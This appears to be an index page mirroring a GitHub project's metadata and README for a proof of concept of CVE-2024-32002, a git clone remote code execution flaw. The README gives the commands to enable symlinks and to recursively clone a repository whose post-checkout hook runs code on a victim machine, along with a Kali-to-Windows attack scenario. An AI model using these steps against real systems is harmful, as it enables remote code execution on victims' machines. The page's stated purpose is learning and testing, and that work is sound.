https://github.com/eqstlab/git_rce
Git clone Remote Code Execution exploit
https://github.com/eqstlab/git_rce
Last synced: 4 months ago
JSON representation
Git clone Remote Code Execution exploit
- Host: GitHub
- URL: https://github.com/eqstlab/git_rce
- Owner: EQSTLab
- Created: 2024-07-03T08:01:39.000Z (almost 2 years ago)
- Default Branch: main
- Last Pushed: 2025-01-12T11:27:38.000Z (over 1 year ago)
- Last Synced: 2025-07-06T00:05:29.414Z (11 months ago)
- Homepage:
- Size: 8.79 KB
- Stars: 5
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# CVE-2024-32002 PoC
1. You must set up the git's symbolic link option like:
```
git config --global core.symlinks true
```
2. Then exploit CVE-2024-32002 by the following command:
```
git clone --recursive https://github.com/EQSTSeminar/git_rce.git
```
# Attack Scenario
kali(192.168.216.129) --Give remote repository address--> Win(192.168.216.130)
kali(192.168.216.129) <--Git clone && hook script(post-checkout) execution-- Win(192.168.216.130)
# Disclaimer
This repository is not intended to be git clone RCE exploit to CVE-2024-32002. The purpose of this project is to help people learn about this vulnerability, and perhaps test their own applications.
# Analysis
https://skshieldus.com/eng/business/insight.do#